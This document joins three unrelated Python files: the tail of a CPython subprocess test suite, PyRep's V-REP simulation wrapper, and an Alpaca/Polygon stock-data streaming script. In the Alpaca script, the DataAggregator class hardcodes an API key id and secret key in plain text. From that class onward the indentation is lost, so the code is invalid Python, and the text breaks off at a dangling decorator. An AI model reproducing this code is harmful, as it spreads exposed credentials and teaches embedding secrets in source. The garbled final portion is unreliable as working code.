        self.assertIn(b"OSError", stderr)
        # Check for a warning due to using handle_list and close_fds=False
        # NOTE(review): support.check_warnings is deprecated in newer CPython;
        # warnings_helper.check_warnings is the replacement.
        with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
            startupinfo = subprocess.STARTUPINFO()
            startupinfo.lpAttributeList = {"handle_list": handles[:]}
            p = subprocess.Popen([sys.executable, "-c",
                                  "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                                 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                 startupinfo=startupinfo, close_fds=False)
            stdout, stderr = p.communicate()
            self.assertEqual(p.returncode, 0)

    def test_empty_attribute_list(self):
        # An empty lpAttributeList dict must be accepted.
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.lpAttributeList = {}
        subprocess.call(ZERO_RETURN_CMD,
                        startupinfo=startupinfo)

    def test_empty_handle_list(self):
        # An empty handle_list inside lpAttributeList must be accepted.
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.lpAttributeList = {"handle_list": []}
        subprocess.call(ZERO_RETURN_CMD,
                        startupinfo=startupinfo)

    def test_shell_sequence(self):
        # Run command through the shell (sequence)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen(["set"], shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        with p:
            self.assertIn(b"physalis", p.stdout.read())

    def test_shell_string(self):
        # Run command through the shell (string)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen("set", shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        with p:
            self.assertIn(b"physalis", p.stdout.read())

    def test_shell_encodings(self):
        # Run command through the shell (string), once per console encoding.
        for enc in ['ansi', 'oem']:
            newenv = os.environ.copy()
            newenv["FRUIT"] = "physalis"
            p = subprocess.Popen("set", shell=1,
                                 stdout=subprocess.PIPE,
                                 env=newenv,
                                 encoding=enc)
            with p:
                self.assertIn("physalis", p.stdout.read(), enc)

    def test_call_string(self):
        # call() function with string argument on Windows
        rc = subprocess.call(sys.executable +
                             ' -c "import sys; sys.exit(47)"')
        self.assertEqual(rc, 47)

    def _kill_process(self, method, *args):
        """Start a long-sleeping child, invoke Popen.<method>(*args) on it,
        and verify it terminated with a nonzero return code."""
        # Some win32 buildbot raises EOFError if stdin is inherited
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             time.sleep(30)
                             """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with p:
            # Wait for the interpreter to be completely initialized before
            # sending any signal.
            p.stdout.read(1)
            getattr(p, method)(*args)
            _, stderr = p.communicate()
            self.assertEqual(stderr, b'')
            returncode = p.wait()
            self.assertNotEqual(returncode, 0)

    def _kill_dead_process(self, method, *args):
        """Invoke Popen.<method>(*args) on a child that has already exited;
        the call must not raise and wait() must return the real exit code."""
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             sys.exit(42)
                             """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with p:
            # Wait for the interpreter to be completely initialized before
            # sending any signal.
            p.stdout.read(1)
            # The process should end after this
            time.sleep(1)
            # This shouldn't raise even though the child is now dead
            getattr(p, method)(*args)
            _, stderr = p.communicate()
            self.assertEqual(stderr, b'')
            rc = p.wait()
            self.assertEqual(rc, 42)

    def test_send_signal(self):
        self._kill_process('send_signal', signal.SIGTERM)

    def test_kill(self):
        self._kill_process('kill')

    def test_terminate(self):
        self._kill_process('terminate')

    def test_send_signal_dead(self):
        self._kill_dead_process('send_signal', signal.SIGTERM)

    def test_kill_dead(self):
        self._kill_dead_process('kill')

    def test_terminate_dead(self):
        self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
    """Miscellaneous tests: KeyboardInterrupt cleanup behavior, the
    getoutput helpers, and the module's __all__ contents."""

    class RecordingPopen(subprocess.Popen):
        """A Popen that saves a reference to each instance for testing."""
        # Class-level on purpose: the test drains it in its finally block.
        instances_created = []

        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            self.instances_created.append(self)

    @mock.patch.object(subprocess.Popen, "_communicate")
    def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
                                        **kwargs):
        """Fake a SIGINT happening during Popen._communicate() and ._wait().

        This avoids the need to actually try and get test environments to send
        and receive signals reliably across platforms. The net effect of a ^C
        happening during a blocking subprocess execution which we want to clean
        up from is a KeyboardInterrupt coming out of communicate() or wait().
        """
        mock__communicate.side_effect = KeyboardInterrupt
        try:
            with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
                # We patch out _wait() as no signal was involved so the
                # child process isn't actually going to exit rapidly.
                mock__wait.side_effect = KeyboardInterrupt
                with mock.patch.object(subprocess, "Popen",
                                       self.RecordingPopen):
                    with self.assertRaises(KeyboardInterrupt):
                        popener([sys.executable, "-c",
                                 "import time\ntime.sleep(9)\nimport sys\n"
                                 "sys.stderr.write('\\n!runaway child!\\n')"],
                                stdout=subprocess.DEVNULL, **kwargs)
                # After the first wait, no unbounded wait() calls are allowed:
                # the cleanup path must never block forever on a live child.
                for call in mock__wait.call_args_list[1:]:
                    self.assertNotEqual(
                        call, mock.call(timeout=None),
                        "no open-ended wait() after the first allowed: "
                        f"{mock__wait.call_args_list}")
                sigint_calls = []
                for call in mock__wait.call_args_list:
                    if call == mock.call(timeout=0.25):  # from Popen.__init__
                        sigint_calls.append(call)
                self.assertLessEqual(mock__wait.call_count, 2,
                                     msg=mock__wait.call_args_list)
                self.assertEqual(len(sigint_calls), 1,
                                 msg=mock__wait.call_args_list)
        finally:
            # cleanup the forgotten (due to our mocks) child process
            process = self.RecordingPopen.instances_created.pop()
            process.kill()
            process.wait()
            self.assertEqual([], self.RecordingPopen.instances_created)

    def test_call_keyboardinterrupt_no_kill(self):
        """call() must not kill the child when interrupted by ^C."""
        self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)

    def test_run_keyboardinterrupt_no_kill(self):
        """run() must not kill the child when interrupted by ^C."""
        self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)

    def test_context_manager_keyboardinterrupt_no_kill(self):
        """Popen.__exit__ must not kill the child when interrupted by ^C."""
        def popen_via_context_manager(*args, **kwargs):
            with subprocess.Popen(*args, **kwargs) as unused_process:
                raise KeyboardInterrupt  # Test how __exit__ handles ^C.
        self._test_keyboardinterrupt_no_kill(popen_via_context_manager)

    def test_getoutput(self):
        """getoutput()/getstatusoutput(): success and failure paths."""
        self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
        self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
                         (0, 'xyzzy'))
        # we use mkdtemp in the next line to create an empty directory
        # under our exclusive control; from that, we can invent a pathname
        # that we _know_ won't exist. This is guaranteed to fail.
        # NOTE(review): the local name `dir` shadows the builtin.
        dir = None
        try:
            dir = tempfile.mkdtemp()
            name = os.path.join(dir, "foo")
            status, output = subprocess.getstatusoutput(
                ("type " if mswindows else "cat ") + name)
            self.assertNotEqual(status, 0)
        finally:
            if dir is not None:
                os.rmdir(dir)

    def test__all__(self):
        """Ensure that __all__ is populated properly."""
        intentionally_excluded = {"list2cmdline", "Handle", "pwd", "grp"}
        exported = set(subprocess.__all__)
        possible_exports = set()
        import types
        for name, value in subprocess.__dict__.items():
            if name.startswith('_'):
                continue
            if isinstance(value, (types.ModuleType,)):
                continue
            possible_exports.add(name)
        self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
                     "Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
    """Re-run the entire ProcessTestCase suite with the select()-based
    selector forced, to cover the non-poll code path in _communicate()."""

    def setUp(self):
        # Swap the selector class used by Popen for the duration of each test.
        self.orig_selector = subprocess._PopenSelector
        subprocess._PopenSelector = selectors.SelectSelector
        ProcessTestCase.setUp(self)

    def tearDown(self):
        # Restore the original selector before the base-class teardown.
        subprocess._PopenSelector = self.orig_selector
        ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces(BaseTestCase):
    """Argument quoting on Windows when the script path and the arguments
    contain spaces, with and without shell=True."""

    def setUp(self):
        super().setUp()
        # Write a helper script whose *filename* contains a space; it echoes
        # argc and lowercased argv so quoting mistakes become visible.
        f, fname = tempfile.mkstemp(".py", "te st")
        self.fname = fname.lower()
        os.write(f, b"import sys;"
                    b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
                 )
        os.close(f)

    def tearDown(self):
        os.remove(self.fname)
        super().tearDown()

    def with_spaces(self, *args, **kwargs):
        """Run the helper with the given Popen arguments and verify argv
        arrived as exactly [script, 'ab cd']."""
        kwargs['stdout'] = subprocess.PIPE
        p = subprocess.Popen(*args, **kwargs)
        with p:
            self.assertEqual(
                p.stdout.read().decode("mbcs"),
                "2 [%r, 'ab cd']" % self.fname
            )

    def test_shell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"), shell=1)

    def test_shell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)

    def test_noshell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"))

    def test_noshell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
    """Popen used as a context manager: stream cleanup, wait-on-exit and
    error paths (including Issue 21619)."""

    def test_pipe(self):
        # __exit__ must close both pipe file objects.
        with subprocess.Popen([sys.executable, "-c",
                               "import sys;"
                               "sys.stdout.write('stdout');"
                               "sys.stderr.write('stderr');"],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as proc:
            self.assertEqual(proc.stdout.read(), b"stdout")
            self.assertEqual(proc.stderr.read(), b"stderr")
        self.assertTrue(proc.stdout.closed)
        self.assertTrue(proc.stderr.closed)

    def test_returncode(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys; sys.exit(100)"]) as proc:
            pass
        # __exit__ calls wait(), so the returncode should be set
        self.assertEqual(proc.returncode, 100)

    def test_communicate_stdin(self):
        # The child exits with 1 iff it received exactly b"context" on stdin.
        with subprocess.Popen([sys.executable, "-c",
                               "import sys;"
                               "sys.exit(sys.stdin.read() == 'context')"],
                              stdin=subprocess.PIPE) as proc:
            proc.communicate(b"context")
            self.assertEqual(proc.returncode, 1)

    def test_invalid_args(self):
        # A spawn failure must propagate out of __enter__.
        with self.assertRaises(NONEXISTING_ERRORS):
            with subprocess.Popen(NONEXISTING_CMD,
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE) as proc:
                pass

    def test_broken_pipe_cleanup(self):
        """Broken pipe error should not prevent wait() (Issue 21619)"""
        proc = subprocess.Popen(ZERO_RETURN_CMD,
                                stdin=subprocess.PIPE,
                                bufsize=support.PIPE_MAX_SIZE*2)
        proc = proc.__enter__()
        # Prepare to send enough data to overflow any OS pipe buffering and
        # guarantee a broken pipe error. Data is held in BufferedWriter
        # buffer until closed.
        proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
        self.assertIsNone(proc.returncode)
        # EPIPE expected under POSIX; EINVAL under Windows
        self.assertRaises(OSError, proc.__exit__, None, None, None)
        self.assertEqual(proc.returncode, 0)
        self.assertTrue(proc.stdin.closed)
# Allow running this test file directly.
if __name__ == "__main__":
    unittest.main()
|
pyrep.py | from pyrep.backend import vrep, utils
from pyrep.objects.object import Object
from pyrep.objects.shape import Shape
from pyrep.textures.texture import Texture
from pyrep.errors import PyRepError
import os
import sys
import time
import threading
from threading import Lock
from typing import Tuple, List
class PyRep(object):
    """Used for interfacing with the V-REP simulation.

    Can be used for starting, stopping, and stepping the simulation. As well
    as getting, and creating scene objects and robots.
    """

    def __init__(self):
        self.running = False            # True while the physics simulation runs
        self._process = None
        self._robot_to_count = {}
        self.connected = False
        self._ui_thread = None
        self._responsive_ui_thread = None
        self._step_lock = Lock()        # serializes simExtStep across threads
        self._init_thread_id = None
        self._shutting_down = False
        self._handles_to_objects = {}
        if 'VREP_ROOT' not in os.environ:
            raise PyRepError(
                'VREP_ROOT not defined. See installation instructions.')
        self._vrep_root = os.environ['VREP_ROOT']
        if not os.path.exists(self._vrep_root):
            raise PyRepError(
                'VREP_ROOT was not a correct path. '
                'See installation instructions')

    def _run_ui_thread(self, scene_file: str, headless: bool) -> None:
        """Entry point of the UI thread spawned by :py:meth:`launch`.

        :param scene_file: Scene to load ('' for an empty scene).
        :param headless: Run without a GUI when True.
        """
        # Need this otherwise extensions will not be loaded
        os.chdir(self._vrep_root)
        options = vrep.sim_gui_headless if headless else vrep.sim_gui_all
        vrep.simExtLaunchUIThread(options=options, scene=scene_file,
                                  pyrep_root=self._vrep_root)

    def _run_responsive_ui_thread(self) -> None:
        """Keep the UI redrawing while the physics simulation is stopped."""
        while True:
            if not self.running:
                with self._step_lock:
                    if self._shutting_down or vrep.simExtGetExitRequest():
                        break
                    vrep.simExtStep(False)
            time.sleep(0.01)
        # If the exit request was from the UI, then call shutdown, otherwise
        # shutdown caused this thread to terminate.
        if not self._shutting_down:
            self.shutdown()

    def launch(self, scene_file="", headless=False, responsive_ui=False,
               blocking=False) -> None:
        """Launches V-REP.

        Launches the UI thread, waits until the UI thread has finished, this
        results in the current thread becoming the simulation thread.

        :param scene_file: The scene file to load. Empty string for empty scene.
        :param headless: Run V-REP in simulation mode.
        :param responsive_ui: If True, then a separate thread will be created to
            asynchronously step the UI of V-REP. Note, that will reduce
            the responsiveness of the simulation thread.
        :param blocking: Causes V-REP to launch as if running the default c++
            client application. This is causes the function to block. For most
            users, this will be set to False.
        """
        if len(scene_file) > 0 and not os.path.isfile(
                os.path.abspath(scene_file)):
            raise PyRepError('Scene file does not exist: %s' % scene_file)
        cwd = os.getcwd()
        self._ui_thread = threading.Thread(target=self._run_ui_thread,
                                           args=(scene_file, headless))
        self._ui_thread.daemon = True
        self._ui_thread.start()

        # Busy-wait until the UI thread is ready for the sim thread to attach.
        while not vrep.simExtCanInitSimThread():
            time.sleep(0.1)

        vrep.simExtSimThreadInit()
        time.sleep(0.2)  # Stops V-REP crashing if it is restarted too quickly.

        if blocking:
            # Behave like the default C++ client: step until exit is requested.
            while not vrep.simExtGetExitRequest():
                vrep.simExtStep()
            self.shutdown()
        elif responsive_ui:
            self._responsive_ui_thread = threading.Thread(
                target=self._run_responsive_ui_thread)
            self._responsive_ui_thread.daemon = True
            try:
                self._responsive_ui_thread.start()
            except (KeyboardInterrupt, SystemExit):
                if not self._shutting_down:
                    self.shutdown()
                sys.exit()
            self.step()
        else:
            self.step()
        os.chdir(cwd)  # Go back to the previous cwd

    def script_call(self, function_name_at_script_name: str,
                    script_handle_or_type: int,
                    ints=(), floats=(), strings=(), bytes='') -> (
            Tuple[List[int], List[float], List[str], str]):
        """Calls a script function (from a plugin, the main client application,
        or from another script). This represents a callback inside of a script.

        :param function_name_at_script_name: A string representing the function
            name and script name, e.g. myFunctionName@theScriptName. When the
            script is not associated with an object, then just specify the
            function name.
        :param script_handle_or_type: The handle of the script, otherwise the
            type of the script.
        :param ints: The input ints to the script.
        :param floats: The input floats to the script.
        :param strings: The input strings to the script.
        :param bytes: The input bytes to the script (as a string).
        :return: Any number of return values from the called Lua function.
        """
        return utils.script_call(
            function_name_at_script_name, script_handle_or_type, ints, floats,
            strings, bytes)

    def shutdown(self) -> None:
        """Shuts down the V-REP simulation.

        :raises PyRepError: If :py:meth:`launch` has not been called.
        """
        if self._ui_thread is None:
            raise PyRepError('V-REP has not been launched. Call launch first.')
        # (The original re-checked `is not None` immediately after the raise
        # above; that guard was redundant and has been removed.)
        self._shutting_down = True
        self.stop()
        self.step_ui()
        vrep.simExtPostExitRequest()
        vrep.simExtSimThreadDestroy()
        self._ui_thread.join()
        if self._responsive_ui_thread is not None:
            self._responsive_ui_thread.join()
        # V-REP crashes if new instance opened too quickly after shutdown.
        # TODO: A small sleep stops this for now.
        time.sleep(0.1)
        self._ui_thread = None
        self._shutting_down = False

    def start(self) -> None:
        """Starts the physics simulation if it is not already running.

        :raises PyRepError: If :py:meth:`launch` has not been called.
        """
        if self._ui_thread is None:
            raise PyRepError('V-REP has not been launched. Call launch first.')
        if not self.running:
            vrep.simStartSimulation()
            self.running = True

    def stop(self) -> None:
        """Stops the physics simulation if it is running.

        :raises PyRepError: If :py:meth:`launch` has not been called.
        """
        if self._ui_thread is None:
            raise PyRepError('V-REP has not been launched. Call launch first.')
        if self.running:
            vrep.simStopSimulation()
            self.running = False
            # Need a few extra steps so the UI reflects the stopped state.
            # (Plain loop: the original list comprehension was used purely
            # for side effects.)
            for _ in range(5):
                self.step()

    def step(self) -> None:
        """Execute the next simulation step.

        If the physics simulation is not running, then this will only update
        the UI.
        """
        with self._step_lock:
            vrep.simExtStep()

    def step_ui(self) -> None:
        """Update the UI.

        This will not execute the next simulation step, even if the physics
        simulation is running.
        This is only applicable when PyRep was launched without a responsive UI.
        """
        with self._step_lock:
            vrep.simExtStep(False)

    def set_simulation_timestep(self, dt: float) -> None:
        """Sets the simulation time step. Default is 0.05.

        :param dt: The time step value in seconds.
        """
        vrep.simSetFloatParameter(vrep.sim_floatparam_simulation_time_step, dt)

    def set_configuration_tree(self, config_tree: bytes) -> None:
        """Restores configuration information previously retrieved.

        Configuration information (object relative positions/orientations,
        joint/path values) can be retrieved with
        :py:meth:`Object.get_configuration_tree`. Dynamically simulated
        objects will implicitly be reset before the command is applied
        (i.e. similar to calling :py:meth:`Object.reset_dynamic_object` just
        before).

        :param config_tree: The configuration tree to restore.
        """
        vrep.simSetConfigurationTree(config_tree)

    def group_objects(self, objects: List[Shape]) -> Shape:
        """Groups several shapes into a compound shape (or simple shape).

        :param objects: The list of shapes to group.
        :return: A single grouped shape.
        """
        handles = [o.get_handle() for o in objects]
        handle = vrep.simGroupShapes(handles)
        return Shape(handle)

    def merge_objects(self, objects: List[Shape]) -> Shape:
        """Merges several shapes into a compound shape (or simple shape).

        :param objects: The list of shapes to group.
        :return: A single merged shape.
        """
        handles = [o.get_handle() for o in objects]
        handle = vrep.simGroupShapes(handles, merge=True)
        return Shape(handle)

    def import_model(self, filename: str) -> Object:
        """Loads a previously saved model.

        :param filename: model filename. The filename extension is required
            ("ttm"). An optional "@copy" can be appended to the filename, in
            which case the model's objects will be named/renamed as if an
            associated script was attached to the model.
        :return: The imported model.
        """
        handle = vrep.simLoadModel(filename)
        return utils.to_type(handle)

    def create_texture(self, filename: str, interpolate=True, decal_mode=False,
                       repeat_along_u=False, repeat_along_v=False
                       ) -> Tuple[Shape, Texture]:
        """Creates a planar shape that is textured.

        :param filename: Path to the texture to load.
        :param interpolate: Adjacent texture pixels are not interpolated.
        :param decal_mode: Texture is applied as a decal (its appearance
            won't be influenced by light conditions).
        :param repeat_along_u: Texture will be repeated along the U direction.
        :param repeat_along_v: Texture will be repeated along the V direction.
        :return: A tuple containing the textured plane and the texture.
        """
        options = 0
        if not interpolate:
            options |= 1
        if decal_mode:
            options |= 2
        # Bug fix: the options are bit flags. The original used `|= 3` and
        # `|= 4`, so repeat_along_u spuriously set the interpolate+decal bits
        # (3 == 1|2) and collided with repeat_along_v. The correct flag
        # values are 4 (repeat U) and 8 (repeat V).
        if repeat_along_u:
            options |= 4
        if repeat_along_v:
            options |= 8
        handle = vrep.simCreateTexture(filename, options)
        s = Shape(handle)
        return s, s.get_texture()
|
alpaca_engine.py | import asyncio
from datetime import datetime
import json
import pprint
import threading
import queue
import os
import sys
import alpaca_trade_api as tradeapi
from alpaca_trade_api.polygon.entity import (
Quote, Trade, Agg, Entity,
)
from alpaca_trade_api.polygon.stream2 import StreamConn as PolygonStreamConn
from alpaca_trade_api.stream2 import StreamConn
from alpha_tech_tracker.redis_client import redis_client
import ipdb
import pandas as pd
from pandas import Timestamp
# Module-level Alpaca REST client, configured from environment variables.
key_id = os.environ.get('ALPACA_KEY_ID')
secret_key = os.environ.get('ALPACA_SECRET_KEY')
api = tradeapi.REST(key_id, secret_key)
# curl "https://api.polygon.io/v1/historic/quotes/SPY/2018-06-01?apiKey=$APCA_API_KEY_ID"
def now():
    """Return the current local wall-clock time as a datetime.

    Bug fix: the original assigned ``datetime.now()`` to a local variable and
    implicitly returned ``None``, so every caller received ``None``.
    """
    return datetime.now()
def test_api():
    """Manual smoke test exercising several polygon REST endpoints.

    Requires network access and valid Alpaca/Polygon credentials; results are
    printed rather than asserted.
    """
    # polygon/REST.historic_agg(size, symbol, _from=None, to=None, limit=None)
    # https://api.polygon.io/v2/aggs/ticker/AAPL/range/5/minute/2019-01-01/2019-02-01?apiKey=<redacted>
    df = api.polygon.historic_agg('minute', 'AMZN', limit=100).df

    # Bug fix: a leftover ipdb.set_trace() breakpoint here blocked any
    # non-interactive run of this smoke test; it has been removed.

    # historic_agg_v2(self, symbol, multiplier, timespan, _from, to, unadjusted=False, limit=None)
    amzn_df = api.polygon.historic_agg_v2('AMZN', 5, 'minute', '2019-07-23', '2019-07-24').df

    # historic_trades(self, symbol, date, offset=None, limit=None):
    trades = api.polygon.historic_trades('AMZN', '2019-07-24')

    # snapshot data
    snapshot = api.polygon.snapshot('CMG')

    with pd.option_context('display.max_rows', None, 'display.max_columns', None):
        print(amzn_df)
def ts():
    """Current time as a pandas Timestamp (used to prefix debug output)."""
    current = pd.Timestamp.now()
    return current
def debug(*args, **kwargs):
    """Print *args to stderr, prefixed with the current timestamp.

    Extra keyword arguments are forwarded to print(); note that passing
    ``file=`` would raise TypeError since stderr is supplied explicitly.
    """
    print(ts(), " ", *args, file=sys.stderr, **kwargs)
async def on_data(conn, channel, data):
    """Catch-all stream callback: log every received entity to stderr."""
    # if opt.debug or not (channel in ('AM', 'Q', 'A', 'T')):
    debug("debug: ", pprint.pformat(data))
def test_stream():
    """Manual smoke test: subscribe to GOOGL minute aggregates and log them.

    Blocks forever inside conn.run(); requires network and credentials.
    """
    conn = StreamConn(key_id=key_id, secret_key=secret_key)
    # conn = PolygonStreamConn(key_id=key_id)
    # conn.register(r'.*', on_data)
    on_data1 = conn.on(r'.*')(on_data)
    # conn.run(['AM.*','XQ.*'])
    # conn.run(['Q.*', 'T.*', 'AM.AMZN', 'A.*'])
    # conn.run(['Q.AMZN'])
    conn.run(['AM.GOOGL'])
# sample output
# Entity({'ev': 'status', 'message': 'subscribed to: A.*', 'status': 'success'})
# [{"ev":"T","sym":"MSFT","p":114.178,"x":"5","s":270,"t":1564101092822, .... }]
# aggregate minutes data into 5 mins in Redis and then save to csv
# construct real time 5 mins trade data for technical analysis signals
# integrate with moving average and 7 days historical data to find resistant and support levels
def get_historical_ochl_data(symbol, interval=5, start_date=None, end_date=None):
    """Fetch historical minute aggregates for *symbol* as a DataFrame.

    Bug fix: the defaults were ``str(now)`` — the repr of the ``now``
    *function object*, never a usable date. Defaults now resolve to today's
    date at call time (a default of ``str(now())`` evaluated at import time
    would also go stale in long-running processes).

    :param symbol: Ticker symbol, e.g. 'AMZN'.
    :param interval: Aggregate bar size in minutes.
    :param start_date: 'YYYY-MM-DD' string; defaults to today.
    :param end_date: 'YYYY-MM-DD' string; defaults to today.
    :return: DataFrame of OCHLV bars from the polygon API.
    """
    today = datetime.now().date().isoformat()
    if start_date is None:
        start_date = today
    if end_date is None:
        end_date = today
    return api.polygon.historic_agg_v2(
        symbol, interval, 'minute', start_date, end_date).df
def save_ticker_min_agg_to_redis(agg_data):
    """Cache the OCHLV fields of one minute Agg bar in Redis.

    The key is "<symbol>_<end-epoch-ms>"; the value is the filtered dict of
    raw bar fields.
    """
    selected_agg_attributes = ['open', 'high', 'low', 'close', 'volume', 'start' , 'end']
    selected_agg_data = {k: v for k, v in agg_data._raw.items() if k in selected_agg_attributes}
    # selected_agg_data['start'] = datetime.utcfromtimestamp(selected_agg_data['start'] / 1000)
    # selected_agg_data['end'] = datetime.utcfromtimestamp(selected_agg_data['end'] / 1000)
    cache_key = agg_data.symbol.lower() + "_" + str(selected_agg_data['end'])
    redis_client.set_object(cache_key, selected_agg_data)
def save_ticker_min_agg_to_json(agg_data):
    """Append the OCHLV fields of one minute Agg bar to a per-symbol
    JSON-lines file (./market_data/<symbol>_min_aggs).

    The file can be re-read with ``pd.read_json(path, orient='records')``
    or line-by-line with ``json.loads``.

    :param agg_data: a polygon ``Agg`` entity; only its ``_raw`` dict and
        ``symbol`` attribute are used.
    """
    selected_agg_attributes = ['open', 'high', 'low', 'close', 'volume',
                               'start', 'end']
    selected_agg_data = {k: v for k, v in agg_data._raw.items()
                         if k in selected_agg_attributes}

    data_dir = './market_data'
    # Robustness: create the output directory on first use instead of crashing.
    os.makedirs(data_dir, exist_ok=True)
    file_name = agg_data.symbol.lower() + "_min_aggs"
    file_path = '{}/{}'.format(data_dir, file_name)
    # Bug fix: the original ended with ``f.close`` (missing parentheses), so
    # the handle was never explicitly closed; a context manager guarantees
    # the flush/close even on error.
    with open(file_path, "a+") as f:
        f.write(json.dumps(selected_agg_data))
        f.write("\n")
def simulate_stream_minute_aggreated_market_data_from_file(file_path, symbol, limit=500):
    """Replay the last *limit* saved minute-agg JSON lines through the class
    streaming handler, simulating live market data.

    :param file_path: JSON-lines file written by save_ticker_min_agg_to_json.
    :param symbol: symbol stamped onto each replayed bar.
    :param limit: number of trailing lines to replay.
    """
    # Close the file deterministically (the original leaked the handle).
    with open(file_path) as f:
        lines = f.readlines()[-limit:]
    for line in lines:
        data = json.loads(line)
        data['symbol'] = symbol
        agg_data = Agg(data)
        promise = DataAggregator.handle_streaming_minute_agg_data({}, {}, agg_data)
        # Bug fix: ``asyncio.async(...)`` is a SyntaxError on Python >= 3.7
        # (``async`` became a keyword); ``ensure_future`` is the replacement.
        asyncio.ensure_future(promise)
class DataAggregator(object):
key_id = 'PKX2ZYMDG183VHH2VPYS'
secret_key = 'HM6fKUfOVohXWj5JG1bD57hM6LE0xM5NaX9aoUCT'
generator_queues = []
def __init__(self):
self.raw_data_df = pd.DataFrame([], columns = ['open', 'high',
'low', 'close', 'volume', ])
self.aggregated_df = pd.DataFrame([], columns = ['open', 'high',
'low', 'close', 'volume', ])
self.handlers = {}
self.selected_agg_attributes = ['open', 'high', 'low', 'close', 'volume', 'start' , 'end']
def add(self, data):
selected_data = {k: v for k, v in data._raw.items() if k in self.selected_agg_attributes}
new_series = pd.Series(selected_data)
new_series.name = Timestamp(new_series['end'], unit='ms', tz='America/New_York')
self.raw_data_df = self.raw_data_df.append(new_series)
latest_timestamp = self.raw_data_df.iloc[-1].name
if len(self.raw_data_df) >= 5 and latest_timestamp.minute % 5 == 0:
self.aggregate_to_5_minutes()
five_mins_handlers = self.handlers.get('5min')
if five_mins_handlers:
for handler in five_mins_handlers:
handler(self.aggregated_df.iloc[-1].copy())
def aggregate_to_5_minutes(self):
interval = 5
aggregated_seires = pd.Series({
'open': self.raw_data_df.iloc[-interval]['open'],
'close': self.raw_data_df.iloc[-1]['close'],
'low': min(self.raw_data_df[-interval:]['low']),
'high': max(self.raw_data_df[-interval:]['high']),
'volume': sum(self.raw_data_df[-interval:]['volume'])
})
aggregated_seires.name = self.raw_data_df.iloc[-5].name
self.aggregated_df = self.aggregated_df.append(aggregated_seires)
def register(self, interval, fn):
if interval not in ['5min']:
raise ValueError("interval needs to be: ['5min']")
if interval in self.handlers:
self.handlers[interval].append(fn)
else:
self.handlers[interval] = [fn]
@classmethod
def fetch_5_mins_aggregated_data(cls, timeout=300, symbol=None):
"""
timeout: default to 5 minutes second, if there is no more data in the next 5 mins,
it will raise queue.Empty error
:return: a generator that waits for the next 5 mins aggregate market data
"""
if not symbol:
raise ValueError("Symbol can not be None")
new_agg_data_queue = queue.Queue()
aggregator = DataAggregator()
aggregator.register('5min', lambda data: new_agg_data_queue.put(data))
async def on_data_2(conn, channel, data):
# if opt.debug or not (channel in ('AM', 'Q', 'A', 'T')):
debug("debug: ", pprint.pformat(data))
if isinstance(data, Agg):
save_ticker_min_agg_to_json(data)
aggregator.add(data)
# ipdb.set_trace()
conn = StreamConn(key_id=cls.key_id, secret_key=cls.secret_key)
on_data1 = conn.on(r'.*')(on_data_2)
# conn.run(['Q.*', 'T.*', 'AM.AMZN', 'A.*'])
# conn.run(['AM.AMZN'])
# ipdb.set_trace()
subscribe_channels = ['AM.{}'.format(symbol)]
stream_thread = threading.Thread(target=conn.run, args=([subscribe_channels]))
stream_thread.start()
# conn.run(['AM.AMZN'])
# data = {
# 'average': 1937.4642,
# 'close': 1940.09,
# 'dailyopen': 1942,
# 'end': 1564170660000,
# 'high': 1940.651,
# 'low': 1939.665,
# 'open': 1940.16,
# 'start': 1564170600000,
# 'symbol': 'AMZN',
# 'totalvolume': 4430955,
# 'volume': 10000,
# 'vwap': 1940.116
# }
# for i in range(7):
# agg_data = Agg(data)
# aggregator.add(agg_data)
# data['start'] += 60000
# data['end'] += 60000
# data['close'] += 1
# data['open'] -= 1
# data['high'] += 2
# data['low'] -= 1
while True:
try:
print('waiting on data')
data = new_agg_data_queue.get(timeout=timeout)
time_index = data.name
yield((time_index, data))
except queue.Empty:
print('Timeout on waiting new data')
break
conn.loop.call_soon_threadsafe(conn.loop.stop)
print('Request to stop Event Loop')
stream_thread.join()
print('Waiting for market data stream thread to join')
@classmethod
